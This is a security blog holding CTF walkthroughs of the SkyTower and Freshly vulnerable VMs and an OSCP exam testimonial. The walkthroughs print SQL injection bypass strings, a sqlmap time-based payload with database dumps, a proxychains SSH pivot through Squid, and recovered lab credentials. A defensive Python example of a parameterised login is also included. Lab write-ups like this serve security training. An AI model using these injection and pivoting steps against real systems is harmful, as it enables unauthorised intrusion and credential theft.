Saturday, May 30, 2015

The Sky Tower Vulnerable VM Walkthrough



I recently took on the challenge to hack the Sky Tower Vulnerable VM. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the "flag".

As usual this VM is hosted by the good folks at vulnhub.com with a ton of other challenges. Here's the approach that I took to gain root level access to the box:

Enumeration

root@kali:~# nmap -A 10.1.1.7

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-28 20:55 EDT
Nmap scan report for 10.1.1.7
Host is up (0.00084s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 10.1.1.7




A quick glance shows a filtered SSH service, a possible website on port 80, and a Squid HTTP proxy. Needing more information, I fired up Nikto and Dirbuster.

root@kali:~# nikto -h 10.1.1.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:10.1.1.7
+ Target Hostname: 10.1.1.7
+ Target Port: 80
+ Start Time: 2015-05-28 21:23:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7343 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2015-05-28 21:24:01 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# dirb http://10.1.1.7

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Thu May 28 21:25:56 2015
URL_BASE: http://10.1.1.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://10.1.1.7/ ----
+ http://10.1.1.7/background (CODE:200|SIZE:2572609)
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)
+ http://10.1.1.7/index (CODE:200|SIZE:1136)
+ http://10.1.1.7/index.html (CODE:200|SIZE:1136)
+ http://10.1.1.7/server-status (CODE:403|SIZE:289)
-----------------
DOWNLOADED: 4592 - FOUND: 5


Ok, looking at these results, I see an outdated version of Apache running, a login.php page which warrants a closer look, and several pages identified by Dirbuster which require investigation.

First let's take a look at the login.php page. We find a typical form-based page which may be susceptible to SQL injection:





Using basic single quote techniques and such, I'm able to get the system to generate an overly verbose message revealing the underlying database type:





Curious, and wanting to justify advancing down the SQLi path, I ran Uniscan to verify the injection point:

root@kali:~# uniscan -u http://10.1.1.7/login.php -d
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.2


Scan date: 28-5-2015 22:0:26
=============================================
| Domain: http://10.1.1.7/login.php/
| Server: Apache/2.2.22 (Debian)
| IP: 10.1.1.7
=============================================
|
| Crawler Started:
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| [+] Crawling finished, 0 URL's found!
|
| FCKeditor File Upload:
|
| E-mails:
|
| External hosts:
|
| Web Backdoors:
|
| File Upload Forms:
|
| Source Code Disclosure:
|
| PHPinfo() Disclosure:
|
| Timthumb:
|
| Ignored Files:
============================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 0 New directories added

| FCKeditor tests:

| Timthumb < 1.33 vulnerability:

| Backup Files:

| Blind SQL Injection:

| Local File Include:

| PHP CGI Argument Injection:

| Remote Command Execution:

| Remote File Include:
| |
| SQL Injection:
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123'&password=123
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123&password=123'

| Cross-Site Scripting (XSS):
|
|
| Web Shell Finder:
====================================

HTML report saved in: report/10.1.1.7.html




I attempted multiple SQL injection login bypass strings to no avail. Additionally, I fired up the Tamper Data proxy browser plugin to gain a bit more control over the session.



Mildly frustrated, I began a search for common SQL injection blacklist bypass techniques. I found lots of information, maybe too much; but eventually I stumbled upon an awesome whitepaper on the exploit-db site https://www.exploit-db.com/papers/17934/.



From the whitepaper I extracted this guidance:

Here is a simple bypass using &&, || instead of and, or respectively.

Filtered injection:
1 or 1 = 1
1 and 1 = 1

Bypassed injection:
1 || 1 = 1
1 && 1 = 1


I used this newfound information to attempt a bypass on the login page. A bit of additional trial and error, mainly around the proper terminating comment character ("--" or "#"), got me past the login page:






Ignoring the filtered status of port 22, I attempted an unsuccessful connection:




Taking the Squid HTTP proxy approach, I decided to attempt to connect using Proxychains. I'd recently performed a similar hack in the Offensive Security OSCP lab, so it wasn't totally foreign to me. I modified /etc/proxychains.conf to connect to the victim machine on port 3189.



Proxychains was able to successfully connect on the machine's ssh port using the obtained credentials:

root@kali:~# proxychains ssh john@10.1.1.7
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
The authenticity of host '10.1.1.7 (10.1.1.7)' can't be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.7' (ECDSA) to the list of known hosts.
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 10.1.1.7 closed.
root@kali:~#




Upon connection the session closes immediately; however, I was able to execute commands over SSH. With this ability I could further system enumeration, attempt to execute a reverse shell, try to escape the shell that keeps shutting down upon connection, etc.

Issuing a "/bin/sh -i" command, I was able to get a more persistent shell, but it did not have "job control". Afraid that this would restrict something I wanted to do, I opted to modify the .bashrc file in John's home directory:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile


I simply renamed the .bashrc file to break its influence on my session.

root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc bashrc.bak"
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:


Finally got a solid shell:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 28 23:52:47 2015 from 10.1.1.7
john@SkyTower:~$


Poking around on the system I took a look in the login.php file and found hardcoded mysql db credentials:



I also found the pesky culprit behind our SQL injection auth bypass issues:

$sqlinjection = array("SELECT", "TRUE", "FALSE", "--","OR", "=", ",", "AND", "NOT");
$email = str_ireplace($sqlinjection, "", $_POST['email']);
$password = str_ireplace($sqlinjection, "", $_POST['password']);

$sql= "SELECT * FROM login where email='".$email."' and password='".$password."';";
$result = $db->query($sql);
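An added Python example (mine, not code from the VM or this walkthrough) that re-implements the str_ireplace blacklist from login.php to show what it actually does to input, and sets beside it a parameterised login with salted hashes that needs no keyword filter at all. The in-memory sqlite3 table, the hash_password and login_safe helpers, and the george@skytech.com address are constructed for the example; the three accounts are the ones the walkthrough dumps from the SkyTech database.

```python
"""Why the SkyTower keyword blacklist is not a control, and what replaces it.

Constructed example, not code from the VM or the walkthrough.
"""
import hashlib
import hmac
import os
import re
import sqlite3

# The blacklist exactly as it appears in the VM's login.php.
SQLINJECTION_BLACKLIST = ["SELECT", "TRUE", "FALSE", "--", "OR", "=", ",", "AND", "NOT"]


def str_ireplace(needles, subject):
    """Mimic PHP str_ireplace(array, "", subject): every needle is removed
    case-insensitively, left to right, from the running result."""
    for needle in needles:
        subject = re.sub(re.escape(needle), "", subject, flags=re.IGNORECASE)
    return subject


def keyword_filter(value):
    """What login.php does to $_POST['email'] and $_POST['password']."""
    return str_ireplace(SQLINJECTION_BLACKLIST, value)


def build_vulnerable_query(email, password):
    """The query login.php builds: the filtered strings are still glued
    straight into SQL, so anything the blacklist misses is parsed as SQL.
    Also note the password is compared in clear text inside the query."""
    return ("SELECT * FROM login where email='" + keyword_filter(email)
            + "' and password='" + keyword_filter(password) + "';")


# --- hardened replacement: bind parameters, store salted hashes ----------

def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt (constructed helper)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest


def make_login_db():
    """Constructed in-memory stand-in for the SkyTech 'login' table, seeded
    with the accounts from the walkthrough but storing hashes, not clear text."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login (id INTEGER PRIMARY KEY, email TEXT UNIQUE, "
        "salt BLOB NOT NULL, pw_hash BLOB NOT NULL)"
    )
    seed = [("john@skytech.com", "hereisjohn"),
            ("sara@skytech.com", "ihatethisjob"),
            ("william@skytech.com", "senseable")]
    for email, pw in seed:
        salt, digest = hash_password(pw)
        conn.execute("INSERT INTO login (email, salt, pw_hash) VALUES (?, ?, ?)",
                     (email, salt, digest))
    conn.commit()
    return conn


def login_safe(conn, email, password):
    """Parameterised lookup plus constant-time hash compare. Whatever the
    user typed is bound as data, never parsed as SQL, so no blacklist is
    needed and legitimate addresses are never mangled."""
    row = conn.execute("SELECT salt, pw_hash FROM login WHERE email = ?",
                       (email,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    # The filter damages real users: "george" loses its "or".
    print(keyword_filter("george@skytech.com"))
    # ...while the || synonym from the whitepaper passes straight through.
    print(keyword_filter("1 || 1 = 1"))
    conn = make_login_db()
    print(login_safe(conn, "sara@skytech.com", "ihatethisjob"))
    print(login_safe(conn, "1 || 1 = 1", "anything"))
```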


Using the db credentials, I was able to log in to the db and extract additional db credentials:

john@SkyTower:/var/www$ mysql --user=root --password=root SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2288
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


-----------------------------------------------------------------------------------------------------------------------------------------------

mysql> use SkyTech;
Database changed

mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

mysql>

Giving the db usernames and passwords a try for system login worked out for me. I was able to log in as sara, who had limited sudo access to list and cat a couple of root directories. I in turn used this access to list the root home directory and cat the flag.txt file.

sara@SkyTower:~$ sudo ls /accounts/../root/
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower


sara@SkyTower:~$ su root
Password:
root@SkyTower:~#


Well, that's all for this one. I really enjoyed this challenge. I'll keep my eyes open for more from the folks at Telspace Systems.


Court Graham, signing off....

Wednesday, May 27, 2015

Offensive Security PWK Course and Exam Testimonial




I recently completed the Penetration Testing with Kali Linux course and successfully passed the Offensive Security Certified Professional Exam. However, the path to success was not without its hurdles. I'm writing this course/exam review to paint a picture of what to expect, as well as shine some light on the mental preparation necessary.

If you are reading this review, I'm just about certain that you know all about the registration process, course syllabus, video and printed material format, hands-on lab environment and examination process. If not, please refer to the Offensive Security training and certification websites.


Like many prospective students of the course, I have a full basket of life responsibilities including but not limited to a full-time job as an information security professional, a husband, father of 3 boys, a 1 hour commute to and from the office, and an infinite honey-do list. With those responsibilities alone you may wonder when I would have time to take on this sort of certification challenge. The short answer is you'll need to cut into your normal sleep hours.

I've broken down my training, lab and exam rants into a list of numbered preconceptions, misconceptions, and suggestions:

Course & Exercises

  1. The PWK Course covers all topics necessary for the exam – I believe this statement to be true, but make sure to study the theories and research the topics on your own. Use both the exercises and lab time to make the practical application of each topic second nature.
  2. You have to complete and submit all of the completed exercises in order to register for the exam – This is not true. The Offensive Security Staff will definitely not impose such restrictions on the student. You'll soon find out how much the responsibility is on you to make sure you are ready. Don't take this as an opportunity to not complete the exercises, they're there for a reason.
  3. You can study by reviewing videos and the documentation and do not require lab time – This is partially true. I'll explain: depending on the time that you can invest (daily/nightly), the initial lab time may only be lightly utilized. Without giving too much away, the early portion of the training is centered around enumeration, both WAN, LAN, and system; this is for good reason. With that said, you'll be able to sharpen these skills in the lab, but this will not require the amount of time that you'll have to invest later in the course. If you find that your initial lab time is running short, don't panic; continue to take the necessary time to study the contents of the videos and printed material.
    Don't hesitate to purchase more lab time if necessary!

The Lab Environment

The PWK Lab Environment consist of approximately 50 machines which span 3 different networks. This is a true playground for the security enthusiast. The degree of difficulty varies from one machine to the next.

  1. You do not have to compromise all 50 machines – As mentioned in my previous point, it is your responsibility to best prepare yourself for the OSCP exam. These machines are priceless in the pursuit of preparation, but it's easy to lose focus and forget about the primary goal, the OSCP certification. You can always purchase lab time with the intent of owning all of the machines if that's your desire.
  2. Regulate the amount of lab assistance you receive – If utilized, the lab and the associated freenode #offsec IRC channel serve as a great resource to communicate with your peers and the Offensive Security administrators. The Offsec admins are wise and will not give you too much information. The prize is truly in the pursuit; they're aware of this and will not hesitate to tell you to "Try Harder".
    Resist the temptation to turn to your peers for too much guidance; it will hurt you in the long run!
  3. Take detailed notes during your lab conquest – This detailed note-taking process will come in handy, as during the exam you will undoubtedly wonder "How did I perform that one exploit, what was the syntax of that one command?" Your notes will save you time and serve as a great study resource even when you are not online. Keepnote, which is available on your Kali Linux image, is in my opinion the best tool for note keeping.

The Exam


I have taken countless IT and security certifications throughout my career, and I had never failed an attempt; until now......

I don't say this to scare or discourage anyone. First off, there is no such thing as failure; just continued opportunities for learning. Corny but true..

Actually, the third time was a charm. I know, how did that happen? Let me tell you how, so you can avoid the same mistakes; believe me, it's possible!


As you all know, you have approximately 24 hours to complete the required exam objectives which are communicated to you the day of the exam via email. You'll have a certain number of machines with associated scored objectives. Achieving these objectives while documenting your process and proof will give you a passing score. Once achieved you must submit the penetration test report to Offsec for evaluation (Pass/Fail).

Ok, now here are some dos and don'ts:

  • Do not allow your eyes to deceive you – You have just completed countless hours of theory and practical application of the required techniques necessary to pass the exam, better yet own the box at hand! "Avoid losing focus of the trees for the forest..." Don't worry about passing the exam until you're done with the last box. The thought and desire to pass can be distracting.
    If you see a certain vulnerability, trust in your training; if it looks like chicken and tastes like chicken, it's probably chicken!


    This was the culprit during my first attempt: don't overthink during the challenge, you know how to do this stuff. Don't let the subtle differences between the lab and exam throw you for a loop; use what you've been trained on.

  • Prepare exploits and a list of go-to commands prior to the test – Yes, you'll have your course materials at your disposal during the exam, but you will not want to flip through pages or take the time to watch videos during the exam. Trust me, it's the shortest 24 hours of your life. I created a spreadsheet, which I'll refine and post for download, that I call my Warchess. It contains the step-by-step stack-based buffer overflow exploitation process as taught in the Offsec training; I was able to use this to make sure I hadn't missed any necessary steps. It also holds common commands, shell escape sequences, Netcat, Python and Perl bind and reverse shell syntax, and a list of my pre-compiled Linux and Windows remote and local exploits.
  • Get plenty of rest – This was partially the culprit during my second attempt. My anticipation for the exam would not allow me to sleep well the night before. I got 3 hours of sleep in total. Ultimately I knew how to achieve success, but did not have the energy and mental fortitude.
  • Download and practice vulnerable applications to exploit – Exploit-DB has several publicized remote buffer overflow exploits which have downloadable links to the vulnerable applications for your own PoCs. Do this; master these exploits and all the curveballs prior to potentially seeing them during the exam.


  • Take frequent breaks – I know this is on a lot of posts; however, do not ignore this. Sitting in one place and concentrating on the exam can be extremely stressful on the body. Make sure you stretch and keep the blood circulating. Also, your mind will benefit from switching gears.

So in summary, I made a couple of fatal mistakes:
  • Not following through with known exploits from the training
  • Not getting enough sleep the night before the examination
  • Not adequately preparing for the unknown

Ultimately, after overcoming my issues, I was able to complete the exam in about 8 hours. I used a bit of the remaining time to put finishing touches on my lab/exam report. The good folks at Offensive Security sent me a congratulations email on the same day, awarding me the elusive OSCP certification; by far my best certification accomplishment thus far.

I will continue to hone my craft in preparation for Cracking the Perimeter/OSCE later this year.

Freshly Vulnerable VM Walkthrough


Today I will be explaining how I was able to complete the Top-Hat-Sec Freshly Challenge. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. I took it just a tiny bit further and gained a root shell. Here's what I did:

Enumeration


After spinning up the VM in VirtualBox, I located its DHCP address on my local NAT network, and had at it:

root@kali:~# nmap -A 10.1.1.11

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-22 21:09 EDT
Nmap scan report for 10.1.1.11
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after:  2025-02-14T03:30:05+00:00
|_ssl-date: 1901-12-13T20:45:52+00:00; -113y160d4h24m13s from local time.
8080/tcp open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.1.1.11

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds
root@kali:~#

______________________________________________________________________________


A quick viewing of some of the hosted webpages brought this challenge close to my geek heart:


Paying heed to the Jedi Mind Trick, I pushed forward.

Continuing with my normal enumeration process, I used Nikto to possibly identify any low-hanging fruit or directories.

This was overlooked -- Nikto scan on port 80 found login.php


root@kali:~# nikto -h 10.1.1.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.11
+ Target Hostname:    10.1.1.11
+ Target Port:        80
+ Start Time:         2015-05-22 23:47:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self'  'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6732 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2015-05-22 23:48:12 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 

______________________________________________________________________________

Needing more information, I turned to Dirbuster to reveal the site's structure or any hidden pages. I quickly found a WordPress site hosted on both port 443 and 8080.


Ok, at this point I was starting to get happy, due to the rich amount of WordPress vulnerabilities out there. I turned to wpscan, trying to enumerate the admin user and find any vulns:

root@kali:~# wpscan --url 10.1.1.11:8080/wordpress/ --enumerate u
_______________________________________________________________
        __          _______   _____                
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.6
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.1.1.11:8080/wordpress/
[+] Started: Fri May 22 21:41:21 2015

[!] The WordPress 'http://10.1.1.11:8080/wordpress/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'http://10.1.1.11:8080/wordpress/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] XML-RPC Interface available under: http://10.1.1.11:8080/wordpress/xmlrpc.php

[+] WordPress version 4.1 identified from meta generator

[+] Enumerating plugins from passive detection ...
 | 4 plugins found:

[+] Name: cart66-lite - v1.5.3
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt

[!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/7737
    Reference: https://research.g0blin.co.uk/g0blin-00022/
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4

[+] Name: contact-form-7 - v4.1
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt

[+] Name: proplayer - v4.7.9.1
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/readme.txt

[!] Title: ProPlayer 4.7.9.1 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/6912
    Reference: http://osvdb.org/93564
    Reference: http://www.exploit-db.com/exploits/25605/

[+] Name: all-in-one-seo-pack - v2.2.5.1
 |  Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
 |  Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | admin | admin |
    +----+-------+-------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Fri May 22 21:41:28 2015
[+] Memory used: 3.234 MB
[+] Elapsed time: 00:00:06
root@kali:~#
_____________________________________________________________________________


Ok, there are a couple of SQL injections, one for the Cart66 Lite plugin. This one requires credentials which I don't have yet..

The ProPlayer Injection plain didn't work for me...

I also tried to brute force the admin user's password, unsuccessfully. I must have overlooked something. Going back through my notes I found the login.php page in my nikto output:

Browsing to it I found a simple login page which had SQL injection written all over it:


I started with a handful of the command injection strings; the author of the VM helped us out a bit by coding a visible 1 or 0 on the page.


A series of single quotes revealed that there was an underlying MySQL database on the server. Sounds like a job for sqlmap:


root@kali:~# sqlmap  -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150527}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:53:02

[23:53:02] [INFO] resuming back-end DBMS 'mysql'
[23:53:02] [INFO] testing connection to the target URL
[23:53:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:53:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:53:03] [INFO] fetching database names
[23:53:03] [INFO] fetching number of databases
[23:53:03] [WARNING] time-based comparison requires larger statistical model, please wait..............................                    
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[23:53:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
7
[23:53:19] [INFO] retrieved:
[23:53:24] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[23:54:35] [INFO] retrieved: login
[23:54:58] [INFO] retrieved: mysql
[23:55:18] [INFO] retrieved: performance_schema
[23:56:29] [INFO] retrieved: phpmyadmin
[23:57:13] [INFO] retrieved: users
[23:57:32] [INFO] retrieved: wordpress8080
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080


[23:58:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'

[*] shutting down at 23:58:32

root@kali:~#


_______________________________________________________________________________


Poking around in each DB with sqlmap, I ultimately found the WordPress admin account:

root@kali:~# sqlmap  -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" -D wordpress8080 --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150527}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:46:07

[23:46:07] [WARNING] using '/root/.sqlmap/output' as the output directory
[23:46:07] [INFO] testing connection to the target URL
[23:46:07] [INFO] heuristics detected web page charset 'ascii'
[23:46:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:46:08] [INFO] target URL is stable
[23:46:08] [INFO] testing if POST parameter 'user' is dynamic
[23:46:08] [WARNING] POST parameter 'user' does not appear dynamic
[23:46:08] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[23:46:08] [INFO] testing for SQL injection on POST parameter 'user'
[23:46:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:46:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:46:09] [INFO] testing 'MySQL inline queries'
